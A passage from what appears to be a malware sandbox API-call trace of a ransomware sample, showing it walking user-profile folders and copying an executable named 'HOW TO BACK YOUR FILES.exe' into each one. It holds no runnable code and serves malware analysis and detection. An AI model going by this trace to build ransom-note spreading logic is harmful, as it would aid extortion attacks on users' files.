Data\\Application Data\\Temporary Internet Files\\Low\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a44a0e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.550] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.550] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.550] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0042.550] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0042.550] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.550] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.550] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.550] GetLastError () returned 0x0 [0042.550] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.550] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.550] CloseHandle (hObject=0x118) returned 1 [0042.551] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.551] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a4bc500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a4bc500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.552] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.552] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.552] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0042.552] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0042.552] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.552] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\x9ohk109\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.552] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.553] GetLastError () returned 0x0 [0042.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.553] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.553] CloseHandle (hObject=0x118) returned 1 [0042.553] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.553] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a4e2660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a4e2660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.553] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.553] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.553] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0042.553] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0042.553] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.553] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\rijuql1c\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.554] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.554] GetLastError () returned 0x0 [0042.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.554] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.554] CloseHandle (hObject=0x118) returned 1 [0042.554] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.554] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.554] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.554] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.555] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0042.555] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0042.555] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.555] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\pmmr5k9k\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.555] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.555] GetLastError () returned 0x0 [0042.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.555] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.555] CloseHandle (hObject=0x118) returned 1 [0042.556] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.556] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.556] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.556] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.556] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0042.556] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0042.556] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.556] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\mm5o9xqs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.557] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.557] GetLastError () returned 0x0 [0042.557] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.557] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.557] CloseHandle (hObject=0x118) returned 1 [0042.557] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.557] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.557] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.557] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.557] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft" [0042.557] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft" [0042.557] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.557] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.558] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.558] GetLastError () returned 0x0 [0042.558] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.558] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.558] CloseHandle (hObject=0x118) returned 1 [0042.558] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.558] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a6392c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.558] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.558] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.559] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0042.559] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0042.559] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.559] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\windows sidebar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.559] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.559] GetLastError () returned 0x0 [0042.559] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.559] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.559] CloseHandle (hObject=0x118) returned 1 [0042.560] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.560] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.560] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.560] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.560] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0042.560] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0042.560] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.560] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\windows sidebar\\gadgets\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.561] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.561] GetLastError () returned 0x0 [0042.561] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.561] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.561] CloseHandle (hObject=0x118) returned 1 [0042.561] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.561] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.561] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.561] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.561] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" [0042.561] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application 